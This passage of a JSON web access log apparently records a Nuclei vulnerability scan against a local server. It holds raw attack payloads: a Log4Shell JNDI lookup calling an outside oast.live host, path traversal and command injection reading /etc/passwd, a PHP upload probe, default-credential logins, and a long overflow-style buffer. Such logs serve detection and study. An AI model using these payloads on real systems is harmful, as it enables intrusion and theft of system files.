AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x0D\x0A\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.047","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /horizon/auth/login/?next=/horizon/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //netcore_get.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"------WebKitFormBoundaryfcKRltGv\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22test.php\x22\x0D\x0AContent-Type: image/avif\x0D\x0A\x0D\x0A\x0D\x0A------WebKitFormBoundaryfcKRltGv--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /Upload/upload_file.php?l=test HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/PWResetUserValidation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /concerto/Login?goto=Central HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.038","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.htpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"username=admin&password=admin?show+webmaster+user","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /js/../../../../../../../../etc/passwd%00.jpg HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"{\x22username\x22:\x22nuclei_29KD22GVC6JQIXxMpkJI3IrShMH\x22,\x22password\x22:\x2229KD253wf6U7SAC1o2ioPbBDjC5\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/signup/step2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"username=${jndi:ldap://${hostName}.ca28fg0smpvbd3qg07h0qg7w7oz94pkwx.oast.live/test}&password=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"username=admin&passwd=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sess-bin/login_handler.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1/sess-bin/login_session.cgi", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search/admin/admin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"type='|cat /etc/passwd||'","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///example.com/%2F.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_inf.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osm_tiles/REGISTER.cmd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWebAdmin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /site_cg/application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /404 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Upload/test/test.php 